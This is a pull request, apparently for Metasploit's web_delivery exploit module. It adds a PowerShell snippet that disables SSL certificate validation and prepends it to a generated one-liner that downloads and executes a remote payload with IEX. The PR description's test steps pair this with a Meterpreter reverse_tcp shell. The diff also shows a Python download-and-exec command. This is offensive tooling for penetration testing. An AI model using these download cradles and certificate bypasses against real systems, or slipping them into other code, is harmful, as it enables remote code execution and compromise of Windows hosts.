### PR TITLE
Powershell web delivery ssl cert validation bypass

### DIFF
--- a/lib/rex/exploitation/powershell/psh_methods.rb
+++ b/lib/rex/exploitation/powershell/psh_methods.rb
@@ -64,6 +64,15 @@ module Powershell
     def self.get_last_login(user)
       %Q^ Get-QADComputer -ComputerRole DomainController | foreach { (Get-QADUser -Service $_.Name -SamAccountName "#{user}").LastLogon} | Measure-Latest^
     end
+
+    #
+    # Disable SSL Certificate verification
+    #
+    # @return [String] Powershell code to disable SSL verification
+    #   checks.
+    def self.ignore_ssl_certificate
+      '[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};'
+    end
   end
 end
 end

--- a/modules/exploits/multi/script/web_delivery.rb
+++ b/modules/exploits/multi/script/web_delivery.rb
@@ -88,9 +88,7 @@ class Metasploit3 < Msf::Exploit::Remote
     when 'Python'
       print_line("python -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"")
     when 'PSH'
-      if ssl
-        ignore_cert = Rex::Exploitation::Powershell::PshMethods.ignore_ssl_certificate
-      end
+      ignore_cert = Rex::Exploitation::Powershell::PshMethods.ignore_ssl_certificate if ssl
       download_and_run = "#{ignore_cert}IEX ((new-object net.webclient).downloadstring('#{url}'))"
       print_line generate_psh_command_line(
                                              noprofile: true,

--- a/modules/exploits/multi/script/web_delivery.rb
+++ b/modules/exploits/multi/script/web_delivery.rb
@@ -88,7 +88,10 @@ class Metasploit3 < Msf::Exploit::Remote
     when 'Python'
       print_line("python -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"")
     when 'PSH'
-      download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))"
+      if ssl
+        ignore_cert = Rex::Exploitation::Powershell::PshMethods.ignore_ssl_certificate
+      end
+      download_and_run = "#{ignore_cert}IEX ((new-object net.webclient).downloadstring('#{url}'))"
       print_line generate_psh_command_line(
                                              noprofile: true,
                                              windowstyle: 'hidden',


### PR DESCRIPTION
The Powershell net.webclient will try to validate the certificate. By default we wont serve up a valid certificate so this will fail.
## Validation
- [x] Use exploit/mutli/script/web_delivery
- [x] set SSL true
- [x] set TARGET 2
- [x] set LHOST x
- [x] set PAYLOAD windows/meterpreter/reverse_tcp
- [x] run - paste command into windows, should fail
- [x] Apply patch, redo steps. see additional statement in generated command. paste into windows, success?
